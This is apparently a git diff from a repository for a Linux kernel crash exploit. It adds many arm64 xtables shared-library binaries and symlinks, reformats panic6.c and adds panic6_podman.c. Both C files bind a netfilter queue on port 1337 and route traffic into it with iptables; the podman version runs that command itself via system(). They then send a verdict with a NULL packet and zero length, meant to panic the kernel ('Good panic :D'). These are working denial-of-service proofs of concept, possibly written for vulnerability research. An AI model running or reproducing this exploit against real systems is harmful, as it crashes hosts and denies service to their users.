b/arm64/xtables/libebt_among.so new file mode 100644 index 0000000..93e4000 Binary files /dev/null and b/arm64/xtables/libebt_among.so differ diff --git a/arm64/xtables/libebt_arp.so b/arm64/xtables/libebt_arp.so new file mode 100644 index 0000000..30afd38 Binary files /dev/null and b/arm64/xtables/libebt_arp.so differ diff --git a/arm64/xtables/libebt_arpreply.so b/arm64/xtables/libebt_arpreply.so new file mode 100644 index 0000000..8f8b5db Binary files /dev/null and b/arm64/xtables/libebt_arpreply.so differ diff --git a/arm64/xtables/libebt_dnat.so b/arm64/xtables/libebt_dnat.so new file mode 100644 index 0000000..f9a86b4 Binary files /dev/null and b/arm64/xtables/libebt_dnat.so differ diff --git a/arm64/xtables/libebt_ip.so b/arm64/xtables/libebt_ip.so new file mode 100644 index 0000000..6a8adbd Binary files /dev/null and b/arm64/xtables/libebt_ip.so differ diff --git a/arm64/xtables/libebt_ip6.so b/arm64/xtables/libebt_ip6.so new file mode 100644 index 0000000..be1b490 Binary files /dev/null and b/arm64/xtables/libebt_ip6.so differ diff --git a/arm64/xtables/libebt_log.so b/arm64/xtables/libebt_log.so new file mode 100644 index 0000000..a3affc4 Binary files /dev/null and b/arm64/xtables/libebt_log.so differ diff --git a/arm64/xtables/libebt_mark.so b/arm64/xtables/libebt_mark.so new file mode 100644 index 0000000..e2fb474 Binary files /dev/null and b/arm64/xtables/libebt_mark.so differ diff --git a/arm64/xtables/libebt_mark_m.so b/arm64/xtables/libebt_mark_m.so new file mode 100644 index 0000000..d522ac3 Binary files /dev/null and b/arm64/xtables/libebt_mark_m.so differ diff --git a/arm64/xtables/libebt_nflog.so b/arm64/xtables/libebt_nflog.so new file mode 100644 index 0000000..1e0c319 Binary files /dev/null and b/arm64/xtables/libebt_nflog.so differ diff --git a/arm64/xtables/libebt_pkttype.so b/arm64/xtables/libebt_pkttype.so new file mode 100644 index 0000000..d48f355 Binary files /dev/null and b/arm64/xtables/libebt_pkttype.so differ diff --git a/arm64/xtables/libebt_redirect.so b/arm64/xtables/libebt_redirect.so new file mode 100644 index 0000000..88c6834 Binary files /dev/null and b/arm64/xtables/libebt_redirect.so differ diff --git a/arm64/xtables/libebt_snat.so b/arm64/xtables/libebt_snat.so new file mode 100644 index 0000000..d8b44f7 Binary files /dev/null and b/arm64/xtables/libebt_snat.so differ diff --git a/arm64/xtables/libebt_stp.so b/arm64/xtables/libebt_stp.so new file mode 100644 index 0000000..417a1fc Binary files /dev/null and b/arm64/xtables/libebt_stp.so differ diff --git a/arm64/xtables/libebt_vlan.so b/arm64/xtables/libebt_vlan.so new file mode 100644 index 0000000..89d3e93 Binary files /dev/null and b/arm64/xtables/libebt_vlan.so differ diff --git a/arm64/xtables/libip6t_DNPT.so b/arm64/xtables/libip6t_DNPT.so new file mode 100644 index 0000000..ce72226 Binary files /dev/null and b/arm64/xtables/libip6t_DNPT.so differ diff --git a/arm64/xtables/libip6t_HL.so b/arm64/xtables/libip6t_HL.so new file mode 100644 index 0000000..e81a3b0 Binary files /dev/null and b/arm64/xtables/libip6t_HL.so differ diff --git a/arm64/xtables/libip6t_NETMAP.so b/arm64/xtables/libip6t_NETMAP.so new file mode 100644 index 0000000..14183f1 Binary files /dev/null and b/arm64/xtables/libip6t_NETMAP.so differ diff --git a/arm64/xtables/libip6t_REJECT.so b/arm64/xtables/libip6t_REJECT.so new file mode 100644 index 0000000..547c728 Binary files /dev/null and b/arm64/xtables/libip6t_REJECT.so differ diff --git a/arm64/xtables/libip6t_SNPT.so b/arm64/xtables/libip6t_SNPT.so new file mode 100644 index 0000000..025c7f1 Binary files /dev/null and b/arm64/xtables/libip6t_SNPT.so differ diff --git a/arm64/xtables/libip6t_ah.so b/arm64/xtables/libip6t_ah.so new file mode 100644 index 0000000..66dd5eb Binary files /dev/null and b/arm64/xtables/libip6t_ah.so differ diff --git a/arm64/xtables/libip6t_dst.so b/arm64/xtables/libip6t_dst.so new file mode 100644 index 0000000..0cd71ee Binary files /dev/null and b/arm64/xtables/libip6t_dst.so differ diff --git a/arm64/xtables/libip6t_eui64.so b/arm64/xtables/libip6t_eui64.so new file mode 100644 index 0000000..9e9d8ef Binary files /dev/null and b/arm64/xtables/libip6t_eui64.so differ diff --git a/arm64/xtables/libip6t_frag.so b/arm64/xtables/libip6t_frag.so new file mode 100644 index 0000000..7d1ff50 Binary files /dev/null and b/arm64/xtables/libip6t_frag.so differ diff --git a/arm64/xtables/libip6t_hbh.so b/arm64/xtables/libip6t_hbh.so new file mode 100644 index 0000000..405667d Binary files /dev/null and b/arm64/xtables/libip6t_hbh.so differ diff --git a/arm64/xtables/libip6t_icmp6.so b/arm64/xtables/libip6t_icmp6.so new file mode 100644 index 0000000..79f5315 Binary files /dev/null and b/arm64/xtables/libip6t_icmp6.so differ diff --git a/arm64/xtables/libip6t_ipv6header.so b/arm64/xtables/libip6t_ipv6header.so new file mode 100644 index 0000000..0ae764b Binary files /dev/null and b/arm64/xtables/libip6t_ipv6header.so differ diff --git a/arm64/xtables/libip6t_mh.so b/arm64/xtables/libip6t_mh.so new file mode 100644 index 0000000..84d7a0a Binary files /dev/null and b/arm64/xtables/libip6t_mh.so differ diff --git a/arm64/xtables/libip6t_rt.so b/arm64/xtables/libip6t_rt.so new file mode 100644 index 0000000..7a7b152 Binary files /dev/null and b/arm64/xtables/libip6t_rt.so differ diff --git a/arm64/xtables/libip6t_srh.so b/arm64/xtables/libip6t_srh.so new file mode 100644 index 0000000..736a6ea Binary files /dev/null and b/arm64/xtables/libip6t_srh.so differ diff --git a/arm64/xtables/libipt_CLUSTERIP.so b/arm64/xtables/libipt_CLUSTERIP.so new file mode 100644 index 0000000..c9509f6 Binary files /dev/null and b/arm64/xtables/libipt_CLUSTERIP.so differ diff --git a/arm64/xtables/libipt_ECN.so b/arm64/xtables/libipt_ECN.so new file mode 100644 index 0000000..197cb99 Binary files /dev/null and b/arm64/xtables/libipt_ECN.so differ diff --git a/arm64/xtables/libipt_NETMAP.so b/arm64/xtables/libipt_NETMAP.so new file mode 100644 index 0000000..7499d79 Binary files /dev/null and b/arm64/xtables/libipt_NETMAP.so differ diff --git a/arm64/xtables/libipt_REJECT.so b/arm64/xtables/libipt_REJECT.so new file mode 100644 index 0000000..e078ef1 Binary files /dev/null and b/arm64/xtables/libipt_REJECT.so differ diff --git a/arm64/xtables/libipt_TTL.so b/arm64/xtables/libipt_TTL.so new file mode 100644 index 0000000..998abe4 Binary files /dev/null and b/arm64/xtables/libipt_TTL.so differ diff --git a/arm64/xtables/libipt_ULOG.so b/arm64/xtables/libipt_ULOG.so new file mode 100644 index 0000000..4449a6d Binary files /dev/null and b/arm64/xtables/libipt_ULOG.so differ diff --git a/arm64/xtables/libipt_ah.so b/arm64/xtables/libipt_ah.so new file mode 100644 index 0000000..02f6200 Binary files /dev/null and b/arm64/xtables/libipt_ah.so differ diff --git a/arm64/xtables/libipt_icmp.so b/arm64/xtables/libipt_icmp.so new file mode 100644 index 0000000..1d844f5 Binary files /dev/null and b/arm64/xtables/libipt_icmp.so differ diff --git a/arm64/xtables/libipt_realm.so b/arm64/xtables/libipt_realm.so new file mode 100644 index 0000000..83a2ba1 Binary files /dev/null and b/arm64/xtables/libipt_realm.so differ diff --git a/arm64/xtables/libxt_AUDIT.so b/arm64/xtables/libxt_AUDIT.so new file mode 100644 index 0000000..a77210d Binary files /dev/null and b/arm64/xtables/libxt_AUDIT.so differ diff --git a/arm64/xtables/libxt_CHECKSUM.so b/arm64/xtables/libxt_CHECKSUM.so new file mode 100644 index 0000000..b7b9526 Binary files /dev/null and b/arm64/xtables/libxt_CHECKSUM.so differ diff --git a/arm64/xtables/libxt_CLASSIFY.so b/arm64/xtables/libxt_CLASSIFY.so new file mode 100644 index 0000000..93b14d7 Binary files /dev/null and b/arm64/xtables/libxt_CLASSIFY.so differ diff --git a/arm64/xtables/libxt_CONNMARK.so b/arm64/xtables/libxt_CONNMARK.so new file mode 100644 index 0000000..b468c17 Binary files /dev/null and b/arm64/xtables/libxt_CONNMARK.so differ diff --git a/arm64/xtables/libxt_CONNSECMARK.so b/arm64/xtables/libxt_CONNSECMARK.so new file mode 100644 index 0000000..179d3d4 Binary files /dev/null and b/arm64/xtables/libxt_CONNSECMARK.so differ diff --git a/arm64/xtables/libxt_CT.so b/arm64/xtables/libxt_CT.so new file mode 100644 index 0000000..c8cfa6c Binary files /dev/null and b/arm64/xtables/libxt_CT.so differ diff --git a/arm64/xtables/libxt_DNAT.so b/arm64/xtables/libxt_DNAT.so new file mode 120000 index 0000000..b558f83 --- /dev/null +++ b/arm64/xtables/libxt_DNAT.so @@ -0,0 +1 @@ +libxt_NAT.so \ No newline at end of file diff --git a/arm64/xtables/libxt_DSCP.so b/arm64/xtables/libxt_DSCP.so new file mode 100644 index 0000000..efc8b06 Binary files /dev/null and b/arm64/xtables/libxt_DSCP.so differ diff --git a/arm64/xtables/libxt_HMARK.so b/arm64/xtables/libxt_HMARK.so new file mode 100644 index 0000000..0447ea3 Binary files /dev/null and b/arm64/xtables/libxt_HMARK.so differ diff --git a/arm64/xtables/libxt_IDLETIMER.so b/arm64/xtables/libxt_IDLETIMER.so new file mode 100644 index 0000000..f2487f9 Binary files /dev/null and b/arm64/xtables/libxt_IDLETIMER.so differ diff --git a/arm64/xtables/libxt_LED.so b/arm64/xtables/libxt_LED.so new file mode 100644 index 0000000..7d1469c Binary files /dev/null and b/arm64/xtables/libxt_LED.so differ diff --git a/arm64/xtables/libxt_LOG.so b/arm64/xtables/libxt_LOG.so new file mode 100644 index 0000000..b5eb85d Binary files /dev/null and b/arm64/xtables/libxt_LOG.so differ diff --git a/arm64/xtables/libxt_MARK.so b/arm64/xtables/libxt_MARK.so new file mode 100644 index 0000000..92836e5 Binary files /dev/null and b/arm64/xtables/libxt_MARK.so differ diff --git a/arm64/xtables/libxt_MASQUERADE.so b/arm64/xtables/libxt_MASQUERADE.so new file mode 120000 index 0000000..b558f83 --- /dev/null +++ b/arm64/xtables/libxt_MASQUERADE.so @@ -0,0 +1 @@ +libxt_NAT.so \ No newline at end of file diff --git a/arm64/xtables/libxt_NAT.so b/arm64/xtables/libxt_NAT.so new file mode 100644 index 0000000..9da7f03 Binary files /dev/null and b/arm64/xtables/libxt_NAT.so differ diff --git a/arm64/xtables/libxt_NFLOG.so b/arm64/xtables/libxt_NFLOG.so new file mode 100644 index 0000000..784b076 Binary files /dev/null and b/arm64/xtables/libxt_NFLOG.so differ diff --git a/arm64/xtables/libxt_NFQUEUE.so b/arm64/xtables/libxt_NFQUEUE.so new file mode 100644 index 0000000..b058de5 Binary files /dev/null and b/arm64/xtables/libxt_NFQUEUE.so differ diff --git a/arm64/xtables/libxt_NOTRACK.so b/arm64/xtables/libxt_NOTRACK.so new file mode 120000 index 0000000..e97684d --- /dev/null +++ b/arm64/xtables/libxt_NOTRACK.so @@ -0,0 +1 @@ +libxt_CT.so \ No newline at end of file diff --git a/arm64/xtables/libxt_RATEEST.so b/arm64/xtables/libxt_RATEEST.so new file mode 100644 index 0000000..2772103 Binary files /dev/null and b/arm64/xtables/libxt_RATEEST.so differ diff --git a/arm64/xtables/libxt_REDIRECT.so b/arm64/xtables/libxt_REDIRECT.so new file mode 120000 index 0000000..b558f83 --- /dev/null +++ b/arm64/xtables/libxt_REDIRECT.so @@ -0,0 +1 @@ +libxt_NAT.so \ No newline at end of file diff --git a/arm64/xtables/libxt_SECMARK.so b/arm64/xtables/libxt_SECMARK.so new file mode 100644 index 0000000..18fb81d Binary files /dev/null and b/arm64/xtables/libxt_SECMARK.so differ diff --git a/arm64/xtables/libxt_SET.so b/arm64/xtables/libxt_SET.so new file mode 100644 index 0000000..347b88d Binary files /dev/null and b/arm64/xtables/libxt_SET.so differ diff --git a/arm64/xtables/libxt_SNAT.so b/arm64/xtables/libxt_SNAT.so new file mode 120000 index 0000000..b558f83 --- /dev/null +++ b/arm64/xtables/libxt_SNAT.so @@ -0,0 +1 @@ +libxt_NAT.so \ No newline at end of file diff --git a/arm64/xtables/libxt_SYNPROXY.so b/arm64/xtables/libxt_SYNPROXY.so new file mode 100644 index 0000000..bd6d396 Binary files /dev/null and b/arm64/xtables/libxt_SYNPROXY.so differ diff --git a/arm64/xtables/libxt_TCPMSS.so b/arm64/xtables/libxt_TCPMSS.so new file mode 100644 index 0000000..8a5f177 Binary files /dev/null and b/arm64/xtables/libxt_TCPMSS.so differ diff --git a/arm64/xtables/libxt_TCPOPTSTRIP.so b/arm64/xtables/libxt_TCPOPTSTRIP.so new file mode 100644 index 0000000..bd04f64 Binary files /dev/null and b/arm64/xtables/libxt_TCPOPTSTRIP.so differ diff --git a/arm64/xtables/libxt_TEE.so b/arm64/xtables/libxt_TEE.so new file mode 100644 index 0000000..b1c9424 Binary files /dev/null and b/arm64/xtables/libxt_TEE.so differ diff --git a/arm64/xtables/libxt_TOS.so b/arm64/xtables/libxt_TOS.so new file mode 100644 index 0000000..f796ccf Binary files /dev/null and b/arm64/xtables/libxt_TOS.so differ diff --git a/arm64/xtables/libxt_TPROXY.so b/arm64/xtables/libxt_TPROXY.so new file mode 100644 index 0000000..a1da71b Binary files /dev/null and b/arm64/xtables/libxt_TPROXY.so differ diff --git a/arm64/xtables/libxt_TRACE.so b/arm64/xtables/libxt_TRACE.so new file mode 100644 index 0000000..a006a65 Binary files /dev/null and b/arm64/xtables/libxt_TRACE.so differ diff --git a/arm64/xtables/libxt_addrtype.so b/arm64/xtables/libxt_addrtype.so new file mode 100644 index 0000000..5b414e7 Binary files /dev/null and b/arm64/xtables/libxt_addrtype.so differ diff --git a/arm64/xtables/libxt_bpf.so b/arm64/xtables/libxt_bpf.so new file mode 100644 index 0000000..733005a Binary files /dev/null and b/arm64/xtables/libxt_bpf.so differ diff --git a/arm64/xtables/libxt_cgroup.so b/arm64/xtables/libxt_cgroup.so new file mode 100644 index 0000000..2a58986 Binary files /dev/null and b/arm64/xtables/libxt_cgroup.so differ diff --git a/arm64/xtables/libxt_cluster.so b/arm64/xtables/libxt_cluster.so new file mode 100644 index 0000000..a690ccb Binary files /dev/null and b/arm64/xtables/libxt_cluster.so differ diff --git a/arm64/xtables/libxt_comment.so b/arm64/xtables/libxt_comment.so new file mode 100644 index 0000000..ae86006 Binary files /dev/null and b/arm64/xtables/libxt_comment.so differ diff --git a/arm64/xtables/libxt_connbytes.so b/arm64/xtables/libxt_connbytes.so new file mode 100644 index 0000000..2b67b13 Binary files /dev/null and b/arm64/xtables/libxt_connbytes.so differ diff --git a/arm64/xtables/libxt_connlabel.so b/arm64/xtables/libxt_connlabel.so new file mode 100644 index 0000000..47c5682 Binary files /dev/null and b/arm64/xtables/libxt_connlabel.so differ diff --git a/arm64/xtables/libxt_connlimit.so b/arm64/xtables/libxt_connlimit.so new file mode 100644 index 0000000..ffb2df3 Binary files /dev/null and b/arm64/xtables/libxt_connlimit.so differ diff --git a/arm64/xtables/libxt_conntrack.so b/arm64/xtables/libxt_conntrack.so new file mode 100644 index 0000000..9249c3b Binary files /dev/null and b/arm64/xtables/libxt_conntrack.so differ diff --git a/arm64/xtables/libxt_cpu.so b/arm64/xtables/libxt_cpu.so new file mode 100644 index 0000000..55762f3 Binary files /dev/null and b/arm64/xtables/libxt_cpu.so differ diff --git a/arm64/xtables/libxt_dccp.so b/arm64/xtables/libxt_dccp.so new file mode 100644 index 0000000..dfdf79a Binary files /dev/null and b/arm64/xtables/libxt_dccp.so differ diff --git a/arm64/xtables/libxt_devgroup.so b/arm64/xtables/libxt_devgroup.so new file mode 100644 index 0000000..9430293 Binary files /dev/null and b/arm64/xtables/libxt_devgroup.so differ diff --git a/arm64/xtables/libxt_ecn.so b/arm64/xtables/libxt_ecn.so new file mode 100644 index 0000000..75a2447 Binary files /dev/null and b/arm64/xtables/libxt_ecn.so differ diff --git a/arm64/xtables/libxt_esp.so b/arm64/xtables/libxt_esp.so new file mode 100644 index 0000000..5912d2f Binary files /dev/null and b/arm64/xtables/libxt_esp.so differ diff --git a/arm64/xtables/libxt_hashlimit.so b/arm64/xtables/libxt_hashlimit.so new file mode 100644 index 0000000..f2231aa Binary files /dev/null and b/arm64/xtables/libxt_hashlimit.so differ diff --git a/arm64/xtables/libxt_helper.so b/arm64/xtables/libxt_helper.so new file mode 100644 index 0000000..2c66715 Binary files /dev/null and b/arm64/xtables/libxt_helper.so differ diff --git a/arm64/xtables/libxt_ipcomp.so b/arm64/xtables/libxt_ipcomp.so new file mode 100644 index 0000000..e0e98fd Binary files /dev/null and b/arm64/xtables/libxt_ipcomp.so differ diff --git a/arm64/xtables/libxt_iprange.so b/arm64/xtables/libxt_iprange.so new file mode 100644 index 0000000..f38e98d Binary files /dev/null and b/arm64/xtables/libxt_iprange.so differ diff --git a/arm64/xtables/libxt_ipvs.so b/arm64/xtables/libxt_ipvs.so new file mode 100644 index 0000000..354cff6 Binary files /dev/null and b/arm64/xtables/libxt_ipvs.so differ diff --git a/arm64/xtables/libxt_length.so b/arm64/xtables/libxt_length.so new file mode 100644 index 0000000..9b58093 Binary files /dev/null and b/arm64/xtables/libxt_length.so differ diff --git a/arm64/xtables/libxt_limit.so b/arm64/xtables/libxt_limit.so new file mode 100644 index 0000000..e7eb460 Binary files /dev/null and b/arm64/xtables/libxt_limit.so differ diff --git a/arm64/xtables/libxt_mac.so b/arm64/xtables/libxt_mac.so new file mode 100644 index 0000000..1bdf46b Binary files /dev/null and b/arm64/xtables/libxt_mac.so differ diff --git a/arm64/xtables/libxt_multiport.so b/arm64/xtables/libxt_multiport.so new file mode 100644 index 0000000..362f28d Binary files /dev/null and b/arm64/xtables/libxt_multiport.so differ diff --git a/arm64/xtables/libxt_nfacct.so b/arm64/xtables/libxt_nfacct.so new file mode 100644 index 0000000..4fb9ff0 Binary files /dev/null and b/arm64/xtables/libxt_nfacct.so differ diff --git a/arm64/xtables/libxt_osf.so b/arm64/xtables/libxt_osf.so new file mode 100644 index 0000000..24d1b47 Binary files /dev/null and b/arm64/xtables/libxt_osf.so differ diff --git a/arm64/xtables/libxt_owner.so b/arm64/xtables/libxt_owner.so new file mode 100644 index 0000000..77c2ff8 Binary files /dev/null and b/arm64/xtables/libxt_owner.so differ diff --git a/arm64/xtables/libxt_physdev.so b/arm64/xtables/libxt_physdev.so new file mode 100644 index 0000000..c253784 Binary files /dev/null and b/arm64/xtables/libxt_physdev.so differ diff --git a/arm64/xtables/libxt_pkttype.so b/arm64/xtables/libxt_pkttype.so new file mode 100644 index 0000000..3ef5a4b Binary files /dev/null and b/arm64/xtables/libxt_pkttype.so differ diff --git a/arm64/xtables/libxt_policy.so b/arm64/xtables/libxt_policy.so new file mode 100644 index 0000000..e911bc6 Binary files /dev/null and b/arm64/xtables/libxt_policy.so differ diff --git a/arm64/xtables/libxt_quota.so b/arm64/xtables/libxt_quota.so new file mode 100644 index 0000000..eeb5fd0 Binary files /dev/null and b/arm64/xtables/libxt_quota.so differ diff --git a/arm64/xtables/libxt_recent.so b/arm64/xtables/libxt_recent.so new file mode 100644 index 0000000..03cf58e Binary files /dev/null and b/arm64/xtables/libxt_recent.so differ diff --git a/arm64/xtables/libxt_rpfilter.so b/arm64/xtables/libxt_rpfilter.so new file mode 100644 index 0000000..769a30d Binary files /dev/null and b/arm64/xtables/libxt_rpfilter.so differ diff --git a/arm64/xtables/libxt_sctp.so b/arm64/xtables/libxt_sctp.so new file mode 100644 index 0000000..8cc6d3b Binary files /dev/null and b/arm64/xtables/libxt_sctp.so differ diff --git a/arm64/xtables/libxt_socket.so b/arm64/xtables/libxt_socket.so new file mode 100644 index 0000000..d1e5276 Binary files /dev/null and b/arm64/xtables/libxt_socket.so differ diff --git a/arm64/xtables/libxt_standard.so b/arm64/xtables/libxt_standard.so new file mode 100644 index 0000000..47d0d3d Binary files /dev/null and b/arm64/xtables/libxt_standard.so differ diff --git a/arm64/xtables/libxt_state.so b/arm64/xtables/libxt_state.so new file mode 120000 index 0000000..24417c2 --- /dev/null +++ b/arm64/xtables/libxt_state.so @@ -0,0 +1 @@ +libxt_conntrack.so \ No newline at end of file diff --git a/arm64/xtables/libxt_statistic.so b/arm64/xtables/libxt_statistic.so new file mode 100644 index 0000000..52d9e96 Binary files /dev/null and b/arm64/xtables/libxt_statistic.so differ diff --git a/arm64/xtables/libxt_string.so b/arm64/xtables/libxt_string.so new file mode 100644 index 0000000..9930f6e Binary files /dev/null and b/arm64/xtables/libxt_string.so differ diff --git a/arm64/xtables/libxt_tcp.so b/arm64/xtables/libxt_tcp.so new file mode 100644 index 0000000..e620ef7 Binary files /dev/null and b/arm64/xtables/libxt_tcp.so differ diff --git a/arm64/xtables/libxt_time.so b/arm64/xtables/libxt_time.so new file mode 100644 index 0000000..201719c Binary files /dev/null and b/arm64/xtables/libxt_time.so differ diff --git a/arm64/xtables/libxt_u32.so b/arm64/xtables/libxt_u32.so new file mode 100644 index 0000000..e3dd82c Binary files /dev/null and b/arm64/xtables/libxt_u32.so differ diff --git a/arm64/xtables/libxt_udp.so b/arm64/xtables/libxt_udp.so new file mode 100644 index 0000000..9c98f93 Binary files /dev/null and b/arm64/xtables/libxt_udp.so differ diff --git a/panic6.c b/panic6.c index 754d840..3322cfe 100644 --- a/panic6.c +++ b/panic6.c @@ -10,55 +10,60 @@ #include #include -//How to compile: -//cc panic6.c -o nfpanic -lmnl -lnetfilter_queue && sudo setcap "CAP_NET_ADMIN+ep" ./nfpanic && ./nfpanic +// How to compile: +// cc panic6.c -o nfpanic -lmnl -lnetfilter_queue && sudo setcap "CAP_NET_ADMIN+ep" ./nfpanic && ./nfpanic int socket_conn(uint16_t port) { - int sockfd, connfd; - struct sockaddr_in servaddr, cli; - - // socket create and verification - sockfd = socket(AF_INET, SOCK_STREAM | SOCK_NONBLOCK, 0); - if (sockfd == -1) { - perror("socket creation failed"); - exit(EXIT_FAILURE); - } - bzero(&servaddr, sizeof(servaddr)); - - // assign IP, PORT - servaddr.sin_family = AF_INET; - servaddr.sin_addr.s_addr = inet_addr("127.0.0.1"); - servaddr.sin_port = htons(port); - - // connect the client socket to server socket - connect(sockfd, (struct sockaddr *)&servaddr, sizeof(servaddr)); + int sockfd, connfd; + struct sockaddr_in servaddr, cli; + + // socket create and verification + sockfd = socket(AF_INET, SOCK_STREAM | SOCK_NONBLOCK, 0); + if (sockfd == -1) + { + perror("socket creation failed"); + exit(EXIT_FAILURE); + } + bzero(&servaddr, sizeof(servaddr)); + + // assign IP, PORT + servaddr.sin_family = AF_INET; + servaddr.sin_addr.s_addr = inet_addr("127.0.0.1"); + servaddr.sin_port = htons(port); + + // connect the client socket to server socket + connect(sockfd, (struct sockaddr *)&servaddr, sizeof(servaddr)); + return sockfd; } int main(int argc, char *argv[]) { - size_t BUF_SIZE = 0xffff+(MNL_SOCKET_BUFFER_SIZE/2); + size_t BUF_SIZE = 0xffff + (MNL_SOCKET_BUFFER_SIZE / 2); char buf[BUF_SIZE]; uint16_t queue_num = 1337; struct nlmsghdr *nlh; puts("[*] Creating the socket with the kernel"); - struct mnl_socket* nl = mnl_socket_open(NETLINK_NETFILTER); - if (nl == NULL) { - perror( "mnl_socket_open" ); + struct mnl_socket *nl = mnl_socket_open(NETLINK_NETFILTER); + if (nl == NULL) + { + perror("mnl_socket_open"); exit(EXIT_FAILURE); } puts("[*] Binding the socket"); - if (mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID) < 0) { - perror( "mnl_socket_bind" ); + if (mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID) < 0) + { + perror("mnl_socket_bind"); exit(EXIT_FAILURE); } - printf("[*] Sending the BIND command for the nfqueue %d\n",queue_num); + printf("[*] Sending the BIND command for the nfqueue %d\n", queue_num); nlh = nfq_nlmsg_put(buf, NFQNL_MSG_CONFIG, queue_num); nfq_nlmsg_cfg_put_cmd(nlh, AF_INET, NFQNL_CFG_CMD_BIND); - if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0) { - perror( "mnl_socket_send" ); + if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0) + { + perror("mnl_socket_send"); exit(EXIT_FAILURE); } @@ -67,11 +72,12 @@ int main(int argc, char *argv[]) nfq_nlmsg_cfg_put_params(nlh, NFQNL_COPY_META, 0xffff); mnl_attr_put_u32(nlh, NFQA_CFG_FLAGS, htonl(NFQA_CFG_F_GSO)); mnl_attr_put_u32(nlh, NFQA_CFG_MASK, htonl(NFQA_CFG_F_GSO)); - if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0) { - perror( "mnl_socket_send" ); + if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0) + { + perror("mnl_socket_send"); exit(EXIT_FAILURE); } - + printf("[*] You need to associate to this queue the port 1337: sudo iptables -t mangle -A PREROUTING -j NFQUEUE -p tcp --dport 1337 --queue-num %d\n", queue_num); puts("Press ENTER to contiune (and panic)"); getchar(); @@ -79,26 +85,25 @@ int main(int argc, char *argv[]) puts("[*] Sending a connection packet to nfqueue"); socket_conn(1337); - puts("[*] Waiting for a packet in the nfqueue"); - if (mnl_socket_recvfrom(nl, buf, BUF_SIZE) == -1) { - perror( "mnl_socket_recvfrom" ); + if (mnl_socket_recvfrom(nl, buf, BUF_SIZE) == -1) + { + perror("mnl_socket_recvfrom"); exit(EXIT_FAILURE); } - puts("[*] Sending the verdict with a NULL pointer and len = 0"); + puts("[*] Setting the verdict with a NULL pointer and len = 0"); nlh = nfq_nlmsg_put(buf, NFQNL_MSG_VERDICT, queue_num); nfq_nlmsg_verdict_put_pkt(nlh, NULL, 0); - nfq_nlmsg_verdict_put(nlh, 1, NF_ACCEPT ); + nfq_nlmsg_verdict_put(nlh, 1, NF_ACCEPT); puts("[*] Sending the verdict to the kernel, Good panic :D"); - sleep(1); //Only to see the print - if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0) { - perror( "mnl_socket_send" ); + sleep(1); // Only to see the print + if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0) + { + perror("mnl_socket_send"); exit(EXIT_FAILURE); } - puts("[*] Are you still alive?"); - + puts("[*] Are you still alive? Probably your kernel is not vulnerable :("); + return EXIT_SUCCESS; } - - diff --git a/panic6_podman.c b/panic6_podman.c new file mode 100644 index 0000000..642ef99 --- /dev/null +++ b/panic6_podman.c @@ -0,0 +1,115 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +// How to compile: +// cc panic6.c -o nfpanic -lmnl -lnetfilter_queue && sudo setcap "CAP_NET_ADMIN+ep" ./nfpanic && ./nfpanic + +int socket_conn(uint16_t port) +{ + int sockfd, connfd; + struct sockaddr_in servaddr, cli; + + // socket create and verification + sockfd = socket(AF_INET, SOCK_STREAM | SOCK_NONBLOCK, 0); + if (sockfd == -1) + { + perror("socket creation failed"); + exit(EXIT_FAILURE); + } + bzero(&servaddr, sizeof(servaddr)); + + // assign IP, PORT + servaddr.sin_family = AF_INET; + servaddr.sin_addr.s_addr = inet_addr("127.0.0.1"); + servaddr.sin_port = htons(port); + + // connect the client socket to server socket + connect(sockfd, (struct sockaddr *)&servaddr, sizeof(servaddr)); + return sockfd; +} + +int main(int argc, char *argv[]) +{ + size_t BUF_SIZE = 0xffff + (MNL_SOCKET_BUFFER_SIZE / 2); + char buf[BUF_SIZE]; + uint16_t queue_num = 1337; + struct nlmsghdr *nlh; + + puts("[*] Creating the socket with the kernel"); + struct mnl_socket *nl = mnl_socket_open(NETLINK_NETFILTER); + if (nl == NULL) + { + perror("mnl_socket_open"); + exit(EXIT_FAILURE); + } + puts("[*] Binding the socket"); + if (mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID) < 0) + { + perror("mnl_socket_bind"); + exit(EXIT_FAILURE); + } + + printf("[*] Sending the BIND command for the nfqueue %d\n", queue_num); + nlh = nfq_nlmsg_put(buf, NFQNL_MSG_CONFIG, queue_num); + nfq_nlmsg_cfg_put_cmd(nlh, AF_INET, NFQNL_CFG_CMD_BIND); + if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0) + { + perror("mnl_socket_send"); + exit(EXIT_FAILURE); + } + + puts("[*] Setting config to COPY_META mode"); + nlh = nfq_nlmsg_put(buf, NFQNL_MSG_CONFIG, queue_num); + nfq_nlmsg_cfg_put_params(nlh, NFQNL_COPY_META, 0xffff); + mnl_attr_put_u32(nlh, NFQA_CFG_FLAGS, htonl(NFQA_CFG_F_GSO)); + mnl_attr_put_u32(nlh, NFQA_CFG_MASK, htonl(NFQA_CFG_F_GSO)); + if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0) + { + perror("mnl_socket_send"); + exit(EXIT_FAILURE); + } + + puts("[*] Linking the nfqueue to a real connection through iptables"); + char cmd[200]; + sprintf(cmd, "iptables -t mangle -A PREROUTING -j NFQUEUE -p tcp --dport 1337 --queue-num %d\n", queue_num); + if (system(cmd) != 0) + { + perror("system"); + exit(EXIT_FAILURE); + } + + puts("[*] Sending a connection packet to nfqueue"); + socket_conn(1337); + + puts("[*] Waiting for a packet in the nfqueue"); + if (mnl_socket_recvfrom(nl, buf, BUF_SIZE) == -1) + { + perror("mnl_socket_recvfrom"); + exit(EXIT_FAILURE); + } + + puts("[*] Sending the verdict with a NULL pointer and len = 0"); + nlh = nfq_nlmsg_put(buf, NFQNL_MSG_VERDICT, queue_num); + nfq_nlmsg_verdict_put_pkt(nlh, NULL, 0); + nfq_nlmsg_verdict_put(nlh, 1, NF_ACCEPT); + + puts("[*] Sending the verdict to the kernel, Good panic :D"); + sleep(1); // Only to see the print + if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0) + { + perror("mnl_socket_send"); + exit(EXIT_FAILURE); + } + + puts("[*] Are you still alive? Probably your kernel is not vulnerable :("); + 